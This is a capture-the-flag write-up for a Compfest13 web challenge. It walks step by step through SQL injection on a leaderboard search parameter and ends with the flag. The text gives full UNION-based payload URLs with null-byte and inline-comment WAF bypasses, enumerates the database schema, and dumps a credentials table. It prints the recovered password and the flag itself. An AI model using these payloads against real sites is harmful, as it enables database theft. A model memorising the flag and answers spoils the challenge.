Tags: sqli web

Rating:

Assalamualaikum everyone.....

Event Name: Compfest13
Challenge Name: Chase The Flag
Level: Hard

We can see there is a URL included with that challenge. The URL is ---> http://103.152.242.56:13534

In the URL, we can see there are some team name and the winner is "Wait, whut" team. We need to login as that team's username and password to get the flag.

Let's look over the source code of that webpage. We can see some js code in script tag at the last part of that webpage's source. Let's try to get some information from the code. We can see 'url = "leaderboard.php";' in 58th line. So let's add leaderboard.php with the URL of that webpage --->
http://103.152.242.56:13534/leaderboard.php
There are the names, ids and scores of all team that participated there.

In 64th line of that webpage's source code, there is a line 'url += "?name=" + keyword;' the url is the main URL of that webpage included leaderboard.php file. the '?name=' is the parameter and 'keyword' is the search query.
Ajax used there so we usually can't get the URL with parameter and search query if we search in the main URL's Search Bar. So the final URL will be --->
http://103.152.242.56:13534/leaderboard.php?name=Alpha

I will show you with the team name Alpha (invalid name will show only '[]'). Add a simple string (') or (%27) after the team name Alpha. We got error from the database "You have an error in your SQL syntax.....near '' ORDER BY points DESC' at line 1". Now the SQL injection part begins. Add a comment, i used (--+-). Still showing error. We will use NULL BYTE INJECTION Technique. Add ;%00 before the comment. The URL will be --->
http://103.152.242.56:13534/leaderboard.php?name=Alpha%27;%00--+-

Error fixed! We need to count columns now. But the webpage has a WAF in spaces ( ), pluses (+) and percent (%). Let's bypass the WAF! I used an inline comment (/**/) in spaces. Let's start with 10 columns since we don't know how many columns are there. The URL will be --->
http://103.152.242.56:13534/leaderboard.php?name=Alpha'/**/order/**/by/**/1,2,3,4,5,6,7,8,9,10;%00--+-

An error showing that Unknown Column 4 In Order Clause. So there are 3 columns. Let's do Union Select to see the vulnerable column. But we need to add 'and 0' before the union select payload (sometimes polygons are important to fix dbs errors). So the URL will be --->
http://103.152.242.56:13534/leaderboard.php?name=Alpha'/**/and/**/0/**/UniOn/**/sEleCT/**/1,2,3;%00--+-

We can inject any of the columns. I injected in 2nd column. So let's count columns and tables.

URL of table names ---> http://103.152.242.56:13534/leaderboard.php?name=Alpha'/**/and/**/0/**/UniOn/**/sEleCT/**/1,table_name,3/**/from/**/information_schema.tables/**/where/**/table_schema=database();%00--+-

URL of column names ---> http://103.152.242.56:13534/leaderboard.php?name=Alpha'/**/and/**/0/**/UniOn/**/sEleCT/**/1,column_name,3/**/from/**/information_schema.columns/**/where/**/table_schema=database();%00--+-

We need to extract winner team username and password that are in teamcreds table. I concatinated username and password with group_concat() function. So let's dump data. The URL will be --->
http://103.152.242.56:13534/leaderboard.php?name=Alpha'/**/and/**/0/**/UniOn/**/sEleCT/**/1,group_concat(username,0x3d3d,password),3/**/from/**/teamcreds;%00--+-

We seen that "Wait, whut" team is the winner and from here, we can see their team's username is "Waitwhut" and password is "Th1sIsN0tPl41nT3xtRight?"

Go to the main URL of the webpage, there is a line "Congratulations! Now, winners can claim their code here!". Tap/Click in here and you will be in the login page. Just login with that username and password and the flag will come as an alert.

Finally the flag is --->

COMPFEST13{get-fifty-percent-off-in-CTF-Course-using-this-code_c765355330}

Thanks everyone for reading my writeup, this is my first writeup about a CTF event's challenge, so please pardon my miatakes.